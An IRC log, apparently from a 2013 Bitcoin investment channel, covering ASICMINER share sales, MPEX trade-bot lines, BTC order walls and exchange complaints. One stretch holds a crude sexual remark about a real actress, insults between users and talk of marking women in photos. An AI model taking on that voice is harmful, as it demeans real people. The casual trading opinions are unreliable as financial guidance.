Feb 16 13:01:57 since it was never a guaranteed investment and it was a startup, they're lucky they're getting ANYTHING back Feb 16 13:02:28 btw, looking back in the records, the its closer to first 3000 than first 2000 Feb 16 13:02:41 How do I check the full fingerprint when verifying a signature? Feb 16 13:03:01 er, first 2500 even Feb 16 13:03:17 so yeah, maybe it is closer to 2000. Feb 16 13:03:23 er 2000 BTC Feb 16 13:03:49 --fingerprint Namworld Feb 16 13:04:15 like gpg --list-keys --fingerprint Feb 16 13:04:48 EskimoBob: I think Im going to do a postmortem later today Feb 16 13:05:03 to see if I can get as close as possible to what was originally put in Feb 16 13:05:31 Hmm... no public key Feb 16 13:08:08 http://polimedia.us/dtng/c/src/136100590180.jpg ginger polis. Feb 16 13:08:47 Ah, well thanks Feb 16 13:09:02 I got all my BitVPS shareholders confirmed now. Feb 16 13:13:36 nice wall at 27 Feb 16 13:14:37 Small wall... Feb 16 13:15:22 biggest wall i have ever seen at 27 Feb 16 13:15:22 The ask side is far more bearish than before. Growth has stopped it seems. Feb 16 13:16:04 biggest ask wall ever at 27 or more btc... Feb 16 13:16:23 http://www.youtube.com/watch?v=2yJe2dRMJUg anyone know who this dood is ? Feb 16 13:16:56 yeah, I guess in 2011 there was less volume both side. Feb 16 13:17:06 :) Feb 16 13:17:12 mp i dont have flash, so i dont know Feb 16 13:17:38 Chaang-Noi i have access to SA's free transcription service, courtesy of lollie. Feb 16 13:17:43 it is pretty funny shit Feb 16 13:17:55 cool Feb 16 13:18:33 i see you like asicminer Feb 16 13:20:23 Who likes ASICMINER? Feb 16 13:21:11 [MPEX] [S.MPOE] 4321 @ 0.00065969 = 2.8505 BTC [+] Feb 16 13:21:13 [MPEX] [S.MPOE] 9250 @ 0.00066002 = 6.1052 BTC [+] Feb 16 13:21:14 [MPEX] [S.MPOE] 2014 @ 0.00066195 = 1.3332 BTC [+] Feb 16 13:21:19 mp's pr lady, and a bunch of others... Feb 16 13:22:15 I thought MP disliked any ASIC/Mining related securities. Feb 16 13:24:24 http://polimedia.us/dtng/c/res/18313.html#18385 lol that's kinda funny Feb 16 13:24:52 hm. pseudo-perpetual miner bonds are bad investments. Feb 16 13:25:04 i don't think much of the off-the-cuff asic manufacturers, Feb 16 13:25:17 but asic technology per se is both unavoidable and necessary Feb 16 13:25:35 just, it has to be done by serious people. Feb 16 13:25:56 It seems ASICMINER may have just pulled that off. Feb 16 13:26:12 It makes me sad I didn't buy more of those. Feb 16 13:26:45 possibly. Feb 16 13:27:05 the one point of concern is of course that technically anyone can create a pool user with an arbitrary hash power. Feb 16 13:27:18 you could do it out of gpus, you could do it out of a botnet, you could do it out of bought hashing Feb 16 13:27:32 I'm still selling my shares while they're hot tho. Feb 16 13:27:58 4100 shares here Feb 16 13:28:22 im on the board, lol Feb 16 13:28:47 [BTCTC] [RSM] 1 @ 0.0099 BTC [+] Feb 16 13:29:19 Mwuahahaha Feb 16 13:29:42 [MPEX] [S.MPOE] 2400 @ 0.00065918 = 1.582 BTC [-] Feb 16 13:31:24 But seriously, don't they keep only people with 5k+ shares tho? Feb 16 13:32:58 i asked him about that and yeah, once they do the count agai im out unless i get 900 more shares Feb 16 13:33:15 but im on the board until they do the count, however being on the baord means nothing lol Feb 16 13:33:24 in the business? Feb 16 13:34:26 oh lol, i have not made a stock trade since glbse fail. Feb 16 13:34:33 i just hold what i hold Feb 16 13:34:48 I keep trading. Feb 16 13:35:07 what are you getting for your asicminer shares? Feb 16 13:35:14 im thinking about selling some now... Feb 16 13:35:21 0.41-0.43 a piece now Feb 16 13:35:47 Someone is selling 5k and has it filled with bids for 0.30 already. Feb 16 13:36:19 damn Feb 16 13:36:37 Assuming no other ASICs come on the market and they mine for months with the majority Feb 16 13:36:55 hmm, take .4 now or wait and hope for 1 btc... Feb 16 13:37:05 i might do 1/2 and 1/2 Feb 16 13:37:09 just sell 2000 Feb 16 13:37:15 I'm sure they'll have some competition soon. Feb 16 13:38:02 well anyone wants 2000 asicminer shares let me know Feb 16 13:38:17 lol :) Feb 16 13:38:29 id rather hold onto them lol Feb 16 13:38:31 I'll take them for 0.01 each, good discount... for me Feb 16 13:39:16 To me .20 would be worth to buy, .40+ is worth to sell. Feb 16 13:39:24 understand Feb 16 13:39:31 im going to look for the .3 ro .4 range Feb 16 13:39:35 to Feb 16 13:39:51 Yeah, I'd assume so. Feb 16 13:41:51 If you sell half for .4, you have a guaranteed 100% profit =) Feb 16 13:42:14 yeah, but i doubt i will get that much Feb 16 13:42:26 ... you'd be surprised. Feb 16 13:42:30 id be happy with .35, still a good chunk of money Feb 16 13:42:42 These sell like cupcakes... Feb 16 13:42:51 id rather move it in one block, not with 20 different people Feb 16 13:43:15 i thought about selling them before but thought they were going to be listed on an exchange soon Feb 16 13:43:46 they were going to be listed on an exchange for 3 months or so Feb 16 13:43:51 https://bitcointalk.org/index.php?topic=142038.msg1532635#msg1532635 Feb 16 13:43:55 Look at this thread Feb 16 13:44:06 113 asnonmous 4400 0.39 Feb 16 13:44:14 currently among the lead for bids... Feb 16 13:44:22 that's pretty much 4400 shares for .4 Feb 16 13:44:34 Guy is selling 5k shares =/ Feb 16 13:44:50 who is asnonmous? Feb 16 13:44:55 No idea Feb 16 13:45:12 hmm yeah Feb 16 13:45:19 all this forum carusel of assignments is bound to end in tears. Feb 16 13:45:20 I had no idea who most bidders were, but most of mine paid. Feb 16 13:45:22 not bad... Feb 16 13:45:41 still time on the auction too Feb 16 13:45:56 yeah Feb 16 13:46:13 Were it not for time and others showing up, my auction would have kept going... Feb 16 13:46:21 I had to refuse a bid arriving too late Feb 16 13:48:50 I usually sell stuff when there's abnormally high demand and buying when there's abnormally no offer on something. Feb 16 13:48:53 [MPEX] [S.MPOE] 8186 @ 0.00066195 = 5.4187 BTC [+] Feb 16 13:48:55 [MPEX] [S.MPOE] 7500 @ 0.00066665 = 4.9999 BTC [+] Feb 16 13:48:57 [MPEX] [S.MPOE] 950 @ 0.00066835 = 0.6349 BTC [+] Feb 16 13:48:58 [MPEX] [S.MPOE] 1964 @ 0.00067009 = 1.3161 BTC [+] Feb 16 13:49:38 Sometimes it keeps going up or down in value, but cashing in a profit safely and bid low again other places seems better than risking it all for a price going further up. Feb 16 13:49:41 since im on the board i think i will offer to sell to other board members first, ill do this when i wake up. Feb 16 13:49:57 Aye, I'll be going to sleep too. Feb 16 13:50:21 peace Feb 16 13:55:49 I don't know. I haven't kept track of anything B.BBVPS related Feb 16 13:55:58 What's happening with that? Feb 16 13:56:12 i wonder about brendio too, did rg run as well? Feb 16 13:56:16 iv not seen either in a long time Feb 16 13:56:21 RG is gone Feb 16 13:56:53 brendio is in austriala, Feb 16 13:57:06 i might have some info on him somewhere :/ Feb 16 13:57:19 im shocked he would just do a runner however Feb 16 13:57:30 he is someone i trusted Feb 16 13:58:04 i thought he was german Feb 16 13:58:12 ;;seen brendio Feb 16 13:58:12 brendio was last seen in #bitcoin-assets 24 weeks, 0 days, 20 hours, 52 minutes, and 23 seconds ago: *nef Feb 16 13:58:24 ^^^ Feb 16 13:58:33 He hasn't shown up anywhere apparently Feb 16 13:59:00 im 90% sure he is in austrilia, why did you think german? Feb 16 13:59:20 ugh. i don't even remember. it's so long Feb 16 13:59:39 he was i think the first person to offer mpex brokering, but it's a haze Feb 16 13:59:44 Where would he run? Feb 16 13:59:56 moreover why would he run ? i don't know he had any outstanding obligations Feb 16 14:00:15 he seems to owe people money Feb 16 14:00:15 well i mean, management for customers and such yes. but not loans or w/e Feb 16 14:00:19 o ? Feb 16 14:00:31 he also did the ppt pass though stuff Feb 16 14:00:41 he did ? Feb 16 14:00:55 yeah, that's a bit odd. Feb 16 14:01:06 i don't recall him being involved Feb 16 14:01:35 He was. Feb 16 14:01:37 http://bitcoin-otc.com/viewratingdetail.php?nick=brendio&sign=ANY&type=RECV << there's not a pirate rating Feb 16 14:01:40 he was ? Feb 16 14:01:49 12113 mrkent 20 brendio 2012-06-26 16:34:14 1 got paid from his pirate bonds :) Feb 16 14:01:57 i guess he must have been, right you are Feb 16 14:02:00 Anyone Chaang, so yeah, RG indeed left BTC-land. He's around OTC occasionally however. Feb 16 14:02:28 hmm Feb 16 14:02:31 Anyhow* Feb 16 14:02:45 [06:08:08] http://polimedia.us/dtng/c/src/136100590180.jpg ginger polis. Feb 16 14:02:48 i get a fail loading btc on linux "error loading blkindex.DAT" Feb 16 14:02:56 amy pond. the doctor is sitting on the curb. Feb 16 14:03:40 [06:35:47] Someone is selling 5k and has it filled with bids for 0.30 already. Feb 16 14:03:43 actually its gone up Feb 16 14:03:53 [MPEX] [S.MPOE] 1300 @ 0.00066396 = 0.8631 BTC [-] Feb 16 14:03:54 o i c. thought it's an actual polis girl lol. Feb 16 14:04:05 anyone know how to deal with that error? Feb 16 14:04:12 mircea_popescu: its spelled police, and no Feb 16 14:04:14 http://upload.wikimedia.org/wikipedia/commons/b/b1/Amy_Pond.jpg why the fuck does she always look like someone stuck an 11 inch icedong up her butt ? Feb 16 14:04:38 mircea_popescu: she doesnt. go watch the series. Feb 16 14:04:48 i ain't watchin' no poliseries :D Feb 16 14:04:52 and shes not even the hottest woman on the show Feb 16 14:05:02 mircea_popescu: USE ENGLISH GODDAMNIT Feb 16 14:05:04 she's not hot at all. lanky teeny type. Feb 16 14:05:08 mircea_popescu: its doctor who you retard Feb 16 14:05:18 ok diabloman i use englice Feb 16 14:05:29 can someone just ban mircea_popescu until he clues up? Feb 16 14:05:32 what, i have to watch doctor who now ? Feb 16 14:07:38 I'm out, goodbye Feb 16 14:12:23 [MPEX] [S.MPOE] 1921 @ 0.00065918 = 1.2663 BTC [-] Feb 16 14:12:25 [MPEX] [S.MPOE] 13450 @ 0.00065903 = 8.864 BTC [-] Feb 16 14:13:18 what is? Feb 16 14:13:36 mircea_popescu's bullshit Feb 16 14:13:45 oh lol Feb 16 14:14:00 he seems like an unhappy guy for being so btc rich :) Feb 16 14:14:04 dude what's with you and that chick. Feb 16 14:14:15 mircea_popescu: I was about to ask you the same exact question Feb 16 14:14:20 you'd think i attacked mohammed's sister/gf in a taliban encampment. Feb 16 14:14:20 we both know mpoe-pr doenst exist Feb 16 14:14:30 o we do ?! Feb 16 14:14:43 and you dont actually "punish" women like you described on your blog with the fake photos Feb 16 14:14:54 orly ?! Feb 16 14:15:04 how are they fake photos ? Feb 16 14:15:06 you're like 14, have no bitcoins, and are trying to leech off people like the bitcoinica dude did Feb 16 14:15:20 how are they fake? because Im pretty sure Ive seen that set before on 4chan. Feb 16 14:15:26 lmao gtfo. Feb 16 14:15:46 that's my motherfucking suit, you've seen me in it in like the blog header and whatnot Feb 16 14:15:47 [MPEX] [S.MPOE] 3800 @ 0.00065903 = 2.5043 BTC [-] Feb 16 14:15:49 [MPEX] [S.MPOE] 3250 @ 0.00065771 = 2.1376 BTC [-] Feb 16 14:15:54 [MPEX] [S.MPOE] 3400 @ 0.00065768 = 2.2361 BTC [-] Feb 16 14:15:55 [MPEX] [S.MPOE] 6450 @ 0.00065759 = 4.2415 BTC [-] Feb 16 14:16:20 Ive never seen you irl, and its not like that suit wasnt mass produced Feb 16 14:16:32 actually it wasn't, but that aside Feb 16 14:16:41 "i think i saw that on 4chan" is about as good as "i can tell because some pixels" Feb 16 14:17:11 mircea_popescu: okay, prove it, send me 400k btc. Feb 16 14:17:23 ... Feb 16 14:17:37 if you're so fucking rich, prove it Feb 16 14:17:47 people who are that rich dont hang out on IRC Feb 16 14:17:56 right, because that's how being rich works. people get online with you and make demands. Feb 16 14:18:04 so you're lucky that i do. Feb 16 14:18:12 they sure as hell they dont admit they have money Feb 16 14:18:31 well not everyone's a pussy. Feb 16 14:19:23 anyway, there : http://trilema.com/2010/portret-al-artistului-la-tinerete/ Feb 16 14:19:36 my costarian money wad, my dollars wad, my pen, my keys... Feb 16 14:19:42 did you see that on 4chan too ? Feb 16 14:19:44 usagi: thats on my playlist anyhow Feb 16 14:19:58 usagi: I have soma.fm installed on my roku downstairs too Feb 16 14:20:18 [MPEX] [S.MPOE] 4321 @ 0.0006637 = 2.8678 BTC [+] Feb 16 14:20:20 [MPEX] [S.MPOE] 7630 @ 0.00066396 = 5.066 BTC [+] Feb 16 14:20:21 [MPEX] [S.MPOE] 2200 @ 0.00067008 = 1.4742 BTC [+] Feb 16 14:20:23 [MPEX] [S.MPOE] 836 @ 0.00067009 = 0.5602 BTC [+] Feb 16 14:20:24 mircea_popescu: yes? I dont know what that is. Feb 16 14:20:25 [MPEX] [S.MPOE] 9313 @ 0.00067055 = 6.2448 BTC [+] Feb 16 14:21:07 cool. Feb 16 14:21:48 it looks like you folded monopoly money up Feb 16 14:22:05 and whats with the paintball gun? Feb 16 14:22:35 usagi: looks like a gay beer brand that used ot be on the market years ago Feb 16 14:22:37 well, did you see it on 4chan ? Feb 16 14:22:51 mircea_popescu: yes, Ive seen both monopoly money and painball guns on 4chan Feb 16 14:23:07 mebbe you spend too much time on 4chan. Feb 16 14:23:18 not really Feb 16 14:23:34 people point lulz threads out to me Feb 16 14:23:51 like, if you were claiming that you had 400k on 4chan, people would have pointed that thread out to me Feb 16 14:24:10 few things are lulzier than that Feb 16 14:24:13 what is 4chan anyway ? Feb 16 14:24:27 basically a site for trolls, I think you'd fit in well there Feb 16 14:24:39 [MPEX] [S.MPOE] 5105 @ 0.00067055 = 3.4232 BTC [+] Feb 16 14:24:47 ima make 400kchan Feb 16 14:26:44 but anyway, the girls in the pic with a switch mark on their butt weren't being punished at the time Feb 16 14:26:50 we were just having st nicholas fun. Feb 16 14:33:31 [MPEX] [S.MPOE] 11700 @ 0.00067345 = 7.8794 BTC [+] Feb 16 14:39:00 [MPEX] [S.MPOE] 4095 @ 0.00067345 = 2.7578 BTC [+] Feb 16 14:43:10 [MPEX] [S.MPOE] 9055 @ 0.00066794 = 6.0482 BTC [-] Feb 16 14:48:01 [MPEX] [S.MPOE] 5350 @ 0.00067493 = 3.6109 BTC [+] Feb 16 14:54:09 [BTCTC] [BITVPS] 500 @ 0.00449 = 2.245 BTC [-] Feb 16 14:54:52 [MPEX] [S.MPOE] 11900 @ 0.00067493 = 8.0317 BTC [+] Feb 16 15:00:40 [MPEX] [S.MPOE] 8500 @ 0.00067347 = 5.7245 BTC [-] Feb 16 15:07:03 [MPEX] [S.MPOE] 5300 @ 0.00067493 = 3.5771 BTC [+] Feb 16 15:23:32 [MPEX] [S.MPOE] 1861 @ 0.00067578 = 1.2576 BTC [+] Feb 16 15:23:33 [MPEX] [S.MPOE] 5000 @ 0.00067577 = 3.3789 BTC [-] Feb 16 15:25:30 btc marketcap 300 million usd :) Feb 16 15:25:56 ;;ticker Feb 16 15:25:56 BTCUSD ticker | Best bid: 27.10000, Best ask: 27.13699, Bid-ask spread: 0.03699, Last trade: 27.10000, 24 hour volume: 37314.47943457, 24 hour low: 26.32100, 24 hour high: 27.50617, 24 hour vwap: 27.12386 Feb 16 15:25:59 wtf. Feb 16 15:27:23 not quite. Feb 16 15:27:33 [MPEX] [S.MPOE] 1789 @ 0.00067496 = 1.2075 BTC [-] Feb 16 15:27:35 [MPEX] [S.MPOE] 3645 @ 0.00067347 = 2.4548 BTC [-] Feb 16 15:27:36 [MPEX] [S.MPOE] 7566 @ 0.00066666 = 5.0439 BTC [-] Feb 16 15:28:49 CoinBr.MPBPT-O at 0.10099999 makes money if MPBOR ends up over what? to estimate what MPBOR comes in at we look at option trade history and extrapolate? Feb 16 15:34:51 [MPEX] [S.MPOE] 1134 @ 0.00066666 = 0.756 BTC [-] Feb 16 15:34:53 [MPEX] [S.MPOE] 9298 @ 0.00066455 = 6.179 BTC [-] Feb 16 15:34:54 [MPEX] [S.MPOE] 2868 @ 0.00066361 = 1.9032 BTC [-] Feb 16 15:46:01 yes i mean if an investor was to buy the passthrough at 0.10099999 Feb 16 15:47:30 thanks Feb 16 15:49:52 [MPEX] [S.MPOE] 36568 @ 0.00067578 = 24.7119 BTC [+] Feb 16 15:49:54 [MPEX] [S.MPOE] 1274 @ 0.00067704 = 0.8625 BTC [+] Feb 16 16:07:31 !ticket mpex s.mpoe Feb 16 16:07:41 !ticker mpex s.mpoe Feb 16 16:07:42 [MPEX:S.MPOE] 1D: 0.00065024 / 0.0006625 / 0.00067787 (1242386 shares, 823.09 BTC), 7D: 0.0006153 / 0.00064333 / 0.00068254 (14678961 shares, 9,443.50 BTC), 30D: 0.00059445 / 0.00066234 / 0.0007 (74525201 shares, 49,361.21 BTC) Feb 16 16:14:02 [MPEX] [S.MPOE] 8350 @ 0.00067704 = 5.6533 BTC [+] Feb 16 16:18:09 [MPEX] [S.MPOE] 100 @ 0.00067704 = 0.0677 BTC [+] Feb 16 16:18:11 [MPEX] [S.MPOE] 8264 @ 0.00067799 = 5.6029 BTC [+] Feb 16 16:18:18 [MPEX] [S.MPOE] 3632 @ 0.00067889 = 2.4657 BTC [+] Feb 16 16:18:42 [MPEX] [S.MPOE] 11649 @ 0.00066826 = 7.7846 BTC [-] Feb 16 16:26:01 [MPEX] [S.MPOE] 1561 @ 0.00066826 = 1.0432 BTC [-] Feb 16 16:26:03 [MPEX] [S.MPOE] 6783 @ 0.00066361 = 4.5013 BTC [-] Feb 16 16:30:19 [MPEX] [S.MPOE] 6249 @ 0.00066361 = 4.1469 BTC [-] Feb 16 16:30:31 [MPEX] [S.MPOE] 4001 @ 0.0006576 = 2.6311 BTC [-] Feb 16 16:31:02 [MPEX] [S.MPOE] 4321 @ 0.00065765 = 2.8417 BTC [+] Feb 16 16:31:04 [MPEX] [S.MPOE] 1127 @ 0.0006576 = 0.7411 BTC [-] Feb 16 16:31:05 [MPEX] [S.MPOE] 752 @ 0.00065759 = 0.4945 BTC [-] Feb 16 16:53:11 [MPEX] [S.MPOE] 5650 @ 0.00067227 = 3.7983 BTC [+] Feb 16 16:53:12 [MPEX] [S.MPOE] 2650 @ 0.00066832 = 1.771 BTC [-] Feb 16 16:55:00 [BTCTC] [GSDPT] 2 @ 0.00626 = 0.0125 BTC [+] Feb 16 17:01:39 [MPEX] [S.MPOE] 3200 @ 0.00067889 = 2.1724 BTC [+] Feb 16 17:06:20 [MPEX] [S.MPOE] 4321 @ 0.00067431 = 2.9137 BTC [-] Feb 16 17:06:21 [MPEX] [S.MPOE] 14250 @ 0.00067432 = 9.6091 BTC [+] Feb 16 17:06:25 [MPEX] [S.MPOE] 394 @ 0.00067889 = 0.2675 BTC [+] Feb 16 17:06:26 [MPEX] [S.MPOE] 2285 @ 0.00067901 = 1.5515 BTC [+] Feb 16 17:14:08 http://seclists.org/oss-sec/2013/q1/326 Feb 16 17:16:39 [MPEX] [S.MPOE] 1400 @ 0.00067901 = 0.9506 BTC [+] Feb 16 17:22:55 [MPEX] [S.MPOE] 7301 @ 0.00067306 = 4.914 BTC [-] Feb 16 17:23:24 now that's some seriously subtle shit. Feb 16 17:41:32 [MPEX] [S.MPOE] 939 @ 0.00067306 = 0.632 BTC [-] Feb 16 17:41:34 [MPEX] [S.MPOE] 4321 @ 0.00067272 = 2.9068 BTC [-] Feb 16 17:41:35 [MPEX] [S.MPOE] 6799 @ 0.00067242 = 4.5718 BTC [-] Feb 16 17:42:50 [MPEX] [S.MPOE] 15 @ 0.00067901 = 0.0102 BTC [+] Feb 16 17:42:52 [MPEX] [S.MPOE] 4200 @ 0.00067934 = 2.8532 BTC [+] Feb 16 17:42:54 [MPEX] [S.MPOE] 4321 @ 0.00067962 = 2.9366 BTC [+] Feb 16 17:42:55 [MPEX] [S.MPOE] 4714 @ 0.00067963 = 3.2038 BTC [+] Feb 16 17:44:55 2000 asicminer shares for sale, contact me if interested. Feb 16 17:46:46 [MPEX] [S.MPOE] 286 @ 0.00067963 = 0.1944 BTC [+] Feb 16 17:46:48 [MPEX] [S.MPOE] 6700 @ 0.00067975 = 4.5543 BTC [+] Feb 16 17:46:51 [MPEX] [S.MPOE] 371 @ 0.00067988 = 0.2522 BTC [+] Feb 16 17:49:46 Chaang-Noi: just put it in the auctions forum Feb 16 17:50:15 meh, i want to just sell it in one block with out that pain if i can avoid it. Feb 16 17:50:26 no one has quite that much cash Feb 16 17:50:34 oh Feb 16 17:50:37 although one guy is bidding on an entire block of 5000 Feb 16 17:50:48 yeah, im only 2k Feb 16 17:50:58 ill take his price of .39 if he bought it all Feb 16 17:51:01 I'll pay 100 BTC for it. Feb 16 17:51:17 for 2k? Feb 16 17:51:25 yes. Feb 16 17:52:21 .05 btc when to going rate is .4? Feb 16 17:52:41 yes. Feb 16 17:52:47 im going to pass. Feb 16 17:52:53 then use the auctions thread Feb 16 17:52:59 btw, you can always sell in blocks of 100 Feb 16 17:53:01 meh Feb 16 17:53:01 the 5000 guy is Feb 16 17:53:48 if i dont sell it it wont be the end of the world Feb 16 17:54:05 you can always wait for the exchange to go up Feb 16 17:54:45 yeah Feb 16 17:54:53 i think .4 might be undervalued honestly Feb 16 17:57:02 http://www.coboloncogs.org/INDEX.HTM Feb 16 17:59:35 [MPEX] [S.DICE] 650 @ 0.0065 = 4.225 BTC [+] Feb 16 18:03:33 [MPEX] [S.MPOE] 5729 @ 0.00067988 = 3.895 BTC [+] Feb 16 18:03:39 [MPEX] [S.MPOE] 2300 @ 0.00067992 = 1.5638 BTC [+] Feb 16 18:03:41 [MPEX] [S.MPOE] 5300 @ 0.00068061 = 3.6072 BTC [+] Feb 16 18:03:43 [MPEX] [S.MPOE] 1071 @ 0.00068103 = 0.7294 BTC [+] Feb 16 18:08:02 https://www.bitmit.net/en/item/16538-chick-fil-a-sauce-1-oz-28-grams Feb 16 18:08:36 i saw that pigeons! Feb 16 18:10:01 once i got out bid on someone selling nothing :) Feb 16 18:10:36 [MPEX] [S.MPOE] 2329 @ 0.00068103 = 1.5861 BTC [+] Feb 16 18:10:38 [MPEX] [S.MPOE] 8371 @ 0.00068136 = 5.7037 BTC [+] Feb 16 18:11:46 i'll give you a second chance offer on that Feb 16 18:12:19 :) Feb 16 18:17:22 [MPEX] [S.MPOE] 2055 @ 0.00067872 = 1.3948 BTC [-] Feb 16 18:20:38 [MPEX] [S.DICE] 1300 @ 0.0065 = 8.45 BTC [+] Feb 16 18:23:47 [MPEX] [S.MPOE] 2895 @ 0.00067872 = 1.9649 BTC [-] Feb 16 18:25:56 [MPEX] [S.MPOE] 3429 @ 0.00068136 = 2.3364 BTC [+] Feb 16 18:25:57 [MPEX] [S.MPOE] 5300 @ 0.00068336 = 3.6218 BTC [+] Feb 16 18:25:59 [MPEX] [S.MPOE] 2000 @ 0.00068337 = 1.3667 BTC [+] Feb 16 18:25:59 [MPEX] [S.MPOE] 121 @ 0.00068372 = 0.0827 BTC [+] Feb 16 18:35:45 [MPEX] [S.MPOE] 4298 @ 0.00067881 = 2.9175 BTC [-] Feb 16 18:47:02 [MPEX] [S.MPOE] 4591 @ 0.00068372 = 3.139 BTC [+] Feb 16 18:47:04 [MPEX] [S.MPOE] 4109 @ 0.00068402 = 2.8106 BTC [+] Feb 16 18:51:30 [MPEX] [S.DICE] 500 @ 0.00651054 = 3.2553 BTC [+] Feb 16 19:02:15 [MPEX] [S.MPOE] 6200 @ 0.0006821 = 4.229 BTC [-] Feb 16 19:06:31 [MPEX] [S.MPOE] 5291 @ 0.00068402 = 3.6191 BTC [+] Feb 16 19:06:33 [MPEX] [S.MPOE] 5759 @ 0.00068506 = 3.9453 BTC [+] Feb 16 19:06:46 http://www.youtube.com/watch?v=OyILRoOhvyQ Feb 16 19:09:19 take it off, queenie Feb 16 19:10:10 was ciuciu scammer tagged? Feb 16 19:10:21 forums arnt loading for me Feb 16 19:12:20 Ukto we need a service to warn of those 5 minutes a day when the forum does work Feb 16 19:12:35 DeadWeasel did you get your coinbase credit btw ? Feb 16 19:12:51 Still pending, 16 hours later, not included in block. Feb 16 19:13:00 5 minutes every X per day Feb 16 19:13:24 no response to support emails. Feb 16 19:13:40 heh. Feb 16 19:13:55 i think they sold my BTCs to someone else, now waiting to refill (someone to sell?) Feb 16 19:13:58 i dunno, shady shit. Feb 16 19:14:22 I would say piss n moan on the forums but.. yeah.. about that. Feb 16 19:15:32 i did last night. Feb 16 19:15:42 doesnt do much good with the site being dead Feb 16 19:15:42 lol Feb 16 19:15:56 reddit too. "Fred" from coinbase said not to worry in a comment. Feb 16 19:16:04 weird how they can respond their but not support emails. Feb 16 19:16:07 how many hour ago was that Feb 16 19:16:07 there* Feb 16 19:16:11 16+ Feb 16 19:16:14 ah Feb 16 19:16:19 then he's being honest Feb 16 19:16:27 ever had someone tell you "Don't worry" and ever be wrong? Feb 16 19:16:28 :P Feb 16 19:16:40 Thats like saying "Trust me." Feb 16 19:17:15 "I won't trust my grandma with 1 bitcoin, what makes you think I will trust you with any dollars?" Feb 16 19:17:49 dammit. I just wanted to get them into my secure wallet, but I can't even get them there. Feb 16 19:18:06 mebbe they oversold Feb 16 19:18:09 waiting for price to drop back Feb 16 19:18:15 and if it doesnt they will just refund you Feb 16 19:18:15 :P Feb 16 19:18:24 [MPEX] [S.MPOE] 17600 @ 0.0006821 = 12.005 BTC [-] Feb 16 19:18:30 :P Feb 16 19:18:31 [MPEX] [S.DICE] 665 @ 0.00664629 = 4.4198 BTC [+] Feb 16 19:18:32 [MPEX] [S.DICE] 1680 @ 0.00665709 = 11.1839 BTC [+] Feb 16 19:23:00 meanwhile back at the ranch Feb 16 19:23:00 http://www.cnbc.com/id/100442841 Feb 16 19:23:23 "The emergency court order freezes assets in a trading firm based in Zurich, Switzerland. The SEC said the freeze guarantees that potentially illegal profits can't be taken out of the account while its investigation continues." Feb 16 19:23:38 basically, traders make money, sec doesn't agree they may keep it, money is frozen. Feb 16 19:24:01 now, and i quote, Feb 16 19:24:12 "the suspicious traders will now have to make an appearance in court to explain their trading if they want their assets unfrozen." Feb 16 19:24:56 [MPEX] [S.MPOE] 7850 @ 0.0006821 = 5.3545 BTC [-] Feb 16 19:25:47 :sigh: Feb 16 19:25:54 The forums sure break a lot. Feb 16 19:28:12 have 2000 asicminer shares for sale, Feb 16 19:29:43 Why're you selling? :trollface: Feb 16 19:29:45 27 wall is gonna fall Feb 16 19:30:14 i want to sell half my stake to garantee profits Feb 16 19:30:25 [MPEX] [S.MPOE] 6950 @ 0.0006821 = 4.7406 BTC [-] Feb 16 19:30:27 [MPEX] [S.MPOE] 2007 @ 0.00067881 = 1.3624 BTC [-] Feb 16 19:30:27 [MPEX] [S.MPOE] 5904 @ 0.00067273 = 3.9718 BTC [-] Feb 16 19:31:35 Just buy 1k more and get on the board. ;) Feb 16 19:31:52 i am on the board... Feb 16 19:32:08 ah, cool. Feb 16 19:32:10 but id rather have 800 btc than 2000 shares Feb 16 19:32:11 surfing board? Feb 16 19:32:15 [MPEX] [S.MPOE] 1141 @ 0.00068506 = 0.7817 BTC [+] Feb 16 19:32:17 [MPEX] [S.MPOE] 4293 @ 0.00068545 = 2.9426 BTC [+] Feb 16 19:32:42 Yeah, a bird in the hand. Feb 16 19:32:56 got bills Feb 16 19:33:19 im still keeping over half my shares Feb 16 19:34:45 I almost bought shares at 0.09. Feb 16 19:34:49 But then I got high. Feb 16 19:34:57 Actually, but then glbse collapsed. Feb 16 19:41:36 heh Feb 16 19:41:38 are those asic bonds paying out yet? Feb 16 19:42:00 or how does that work Feb 16 19:44:11 [MPEX] [S.MPOE] 6900 @ 0.00068731 = 4.7424 BTC [+] Feb 16 19:44:13 [MPEX] [S.MPOE] 2872 @ 0.00068805 = 1.9761 BTC [+] Feb 16 19:44:55 not paying yet, but mining Feb 16 19:47:10 [MPEX] [S.MPOE] 6159 @ 0.00068559 = 4.2225 BTC [-] Feb 16 19:47:13 [MPEX] [S.MPOE] 5041 @ 0.00068518 = 3.454 BTC [-] Feb 16 19:47:17 ;;ticker Feb 16 19:47:17 BTCUSD ticker | Best bid: 27.09272, Best ask: 27.10000, Bid-ask spread: 0.00728, Last trade: 27.10000, 24 hour volume: 28637.91569860, 24 hour low: 26.80750, 24 hour high: 27.50617, 24 hour vwap: 27.16874 Feb 16 19:48:03 ;;asks 30 Feb 16 19:48:05 There are currently 33232.096 bitcoins offered at or under 30.0 USD, worth 953345.261061 USD in total. Feb 16 19:49:49 http://trilema.com/2013/fiat-vs-bitcoin-a-comparison/ Feb 16 19:51:22 [MPEX] [S.MPOE] 1978 @ 0.00068805 = 1.361 BTC [+] Feb 16 19:51:26 [MPEX] [S.MPOE] 2040 @ 0.00068835 = 1.4042 BTC [+] Feb 16 19:59:13 [MPEX] [S.MPOE] 1220 @ 0.00068518 = 0.8359 BTC [-] Feb 16 19:59:15 [MPEX] [S.MPOE] 4321 @ 0.00067806 = 2.9299 BTC [-] Feb 16 19:59:17 [MPEX] [S.MPOE] 8159 @ 0.00067805 = 5.5322 BTC [-] Feb 16 20:02:21 [MPEX] [S.MPOE] 5560 @ 0.00068835 = 3.8272 BTC [+] Feb 16 20:02:23 [MPEX] [S.MPOE] 3399 @ 0.00068845 = 2.34 BTC [+] Feb 16 20:05:56 [MPEX] [S.MPOE] 1206 @ 0.00067805 = 0.8177 BTC [-] Feb 16 20:06:01 [MPEX] [S.MPOE] 6750 @ 0.000678 = 4.5765 BTC [-] Feb 16 20:06:04 [MPEX] [S.MPOE] 2544 @ 0.00067628 = 1.7205 BTC [-] Feb 16 20:15:57 [MPEX] [S.MPOE] 922 @ 0.00068845 = 0.6348 BTC [+] Feb 16 20:15:59 [MPEX] [S.MPOE] 5528 @ 0.00068846 = 3.8058 BTC [+] Feb 16 20:24:27 [MPEX] [S.MPOE] 2856 @ 0.00067628 = 1.9315 BTC [-] Feb 16 20:24:29 [MPEX] [S.MPOE] 4321 @ 0.00067274 = 2.9069 BTC [-] Feb 16 20:24:31 [MPEX] [S.MPOE] 2023 @ 0.00067273 = 1.3609 BTC [-] Feb 16 20:27:15 [MPEX] [S.MPOE] 4321 